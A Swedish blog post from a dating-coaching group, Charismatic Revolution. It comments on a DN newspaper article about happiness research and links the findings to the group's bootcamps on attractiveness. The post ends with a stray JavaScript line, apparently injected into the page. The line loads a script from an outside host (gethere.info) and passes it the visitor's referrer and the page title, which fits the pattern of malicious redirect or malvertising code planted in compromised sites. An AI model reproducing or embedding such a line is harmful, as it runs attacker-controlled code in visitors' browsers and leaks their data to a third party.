dagens logo DN: Man kan lära sig att bli lycklig
Läste en mycket intressant artikel i dagens upplaga av DN.
Den nya forskning som behandlas i artikeln tycker jag har mycket att göra med det vi ser och praktiserar här på Charismatic Revolution, så jag tänkte kommentera och reflektera lite kring delar av det hon skriver.
Lyckan är till stor del genetiskt programmerad. Men med lite övning går det att bli en lyckligare människa, visar ny forskning.

- De flesta tänker att sådant som pengar, hälsa och äktenskap har stor betydelse för lycka, men det har de inte, säger Sonja Lyubomirsky, professor i psykologi vid Californiauniversitetet.

Hon är del av ett växande område inom psykologin som intresserar sig för livets ljusa sidor.

Mycket av forskningen inom psykologin har annars mest fokuserat på det som kan gå fel.

Det här tycker jag är sjukt intressant. Må så vara att lycka till viss del är en genetisk förutsättning, alla har med andra ord inte samma grundläggande förutsättningar för att få ett lyckligt liv utan att anstränga sig. Det i sig är intressant, men det har inte särskilt mycket bäring på det vi sysslar med, utan det är snarare den andra delen som är intressant för oss. Människor kan lära sig att bete sig på sätt som gör dem lyckliga, det är nyckeln!

Att vara en lycklig person som älskar sitt liv är nämligen en av de mest attraktiva egenskaper en person kan ha. Om man njuter av sitt liv och är en lycklig person så kommer andra människor att vilja vara en del av det, det tror jag de flesta kan köpa utan någon vidare förklaring. Det är också intressant att hon säger, ”De flesta tänker att sådant som pengar, hälsa och äktenskap har stor betydelse…men det har de inte…”, vilket är något som vi absolut anammar. Vi hävdar bestämt (och leder dessutom i bevis i princip varje helg när vi har bootcamp) att pengar, utseende och annan materiell status inte har någon bäring alls på vad som gör en person attraktiv. Precis som artikeln tar upp är det beteendet som är nyckeln för ett lyckligt liv, det kan direkt översättas även till området attraktion och att vara en attraktiv person. Beteendet ÄR nyckeln!

Det är också intressant att de tar upp att psykologin annars mest fokuserat på det som kan gå fel, som så många andra områden i vår kultur som i min mening är så starkt inriktad på problemlösning att vi som individer lär oss att hitta fel överallt istället för att se och uppskatta allt som faktiskt är perfekt. En stor del av att bli en lycklig människa är jag övertygad om går ut på att lära sig fokusera på det som är positivt i ditt liv, och en ”sanning” som vi bankar in i våra studenter på bootcamp är att det finns något positivt i varje situation.

Förklaringen, enligt forskarna, är ett fenomen de kallar för hedonisk anpassning. Människor tenderar att vänja sig vid nya saker i sitt liv. När man väl har vant sig vid till exempel en ny bil, att vara gift eller att bo i ett stort hus så får man inte ut lika mycket lycka av det längre. Visserligen finner ekonomiska forskare ett samband mellan länders ekonomiska tillväxt och nivån på människors välbefinnande, men över en viss inkomstnivå är detta samband oklart. Andra studier från exempelvis USA visar att lyckonivåerna inte har ökat sedan mitten av 1900-talet, trots att inkomsterna har gjort det.

Kort sagt, ”you’re not your fucking khakis”. Amen. icon smile DN: Man kan lära sig att bli lycklig

En annan vanlig uppfattning är att framgång i arbetslivet och i sociala sammanhang gör oss lyckligare. Men enligt Sonja Lyubomirsky är det ofta i stället lyckan som kommer först. Bakom denna slutsats finns 225 olika studier med närmare 275.000 försökspersoner. Hennes analyser av materialet visar att lyckliga människor är mer framgångsrika och har en högre chans att höja sina inkomster.

- Positiva känslor leder i en uppåtgående spiral. När människor känner sig lyckliga känner de sig också oftare mer självsäkra, optimistiska och energiska. Det gör dem också mer omtyckta av andra, säger Sonja Lyubomirsky.

Återigen, människor tycker om att vara i lyckliga personers närvaro. Anledningen till att jag tycker att det här stycket är intressant är dock något som jag ständigt ser hos killar på forumet, bootcampstudenter och andra som varit i kontakt med vår verksamhet. Det som börjar som ett sätt att bli en mer attraktiv person och få fler kvinnor i sitt liv utvecklas ofta till något mycket större och jag har ett otal exempel på killar (inklusive jag själv) som vittnar om att den positiva spiral som börjar med att man blir en mer utåtriktad och social person ofta spiller över i många andra områden i livet och inte bara ger resultatet att de får fler kvinnor i sina liv. De ser också betydligt mer framgång i yrkeslivet, i sina relationer med vänner och sin inställning och livskvalité helt allmänt. Det är sjukt coolt, och jag är inte förvånad att forskare som tittat på det nu ser samma sak. Framgång föder framgång.

Övriga 40 procent i diagrammet hänför hon till individens eget beteende.

- En stor procentsats styr du själv över. Det betyder att det spelar roll hur du uppför dig och hur du väljer att agera, säger Sonja Lyubomirsky.

Med andra ord är nästan hälften av vår upplevda lyckonivå och livskvalité produkten av vårt eget beteende och hur vi väljer att utvecklas och se på livet. Det innebär (om man nu ska försöka mäta lycka i procent, vilket jag själv tycker känns väldigt märkligt) att det i många människors liv finns utrymme för en nästan 100%-ig förbättring om de ändrar sitt beteende och synsätt på livet…det är fan inte kattpiss. icon wink DN: Man kan lära sig att bli lycklig

I en studie har hon jämfört två olika strategier. Under en åttaveckorsperiod fick en grupp varje vecka skriva på ett brev som uttryckte tacksamhet gentemot någon i deras liv. En annan grupp fick varje vecka föreställa sig sin framtid i positivt sken om tio år. Kontrollgruppen skrev bara ner sådant som hänt under veckan. I båda de första fallen drog försökspersonerna nytta av övningarna, men resultatet varierade med den personliga motivationen.

- De olika strategierna går i princip ut på att regelbundet öka mängden positiva känslor. Dessa känslor sammantaget är det som skapar lyckan, säger Sonja Lyubomirsky.

Därför är svaret heller inte det intensiva lyckoruset vid ett stort äventyr eller av droger. En bättre strategi, enligt Sonja Lyubomirsky, är att ta vara på de små ögonblicken av njutning i vardagen, att visa lite vänlighet mot andra, och att uppskatta det du har.

Det här gör mig nästan mest glad av allt. Nu finns det alltså forskning, svart på vitt, som stöder det vi har lärt ut sen vi startade. Att vara en varm och värdegivande person är inte bara det mest attraktiva beteendet en person kan ha, det är dessutom nyckeln till ett lyckligare och mer rikt liv! (läs gärna om den ”varma alfan” i vår artikel om alfakonceptet, vilket är grunden till det mesta vi gör och lär ut) Så om du inte redan tagit steget och följer oss, bli en del av den karismatiska revolutionen idag!

Vi kan inte bara att hjälpa dig bli en mer attraktiv person med förmågan att ha ett rikt liv fullt med kvinnor, det kommer dessutom att göra dig till en lyckligare individ. Nice bonus… icon wink DN: Man kan lära sig att bli lycklig

Kram,
-Victor (Sanji)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;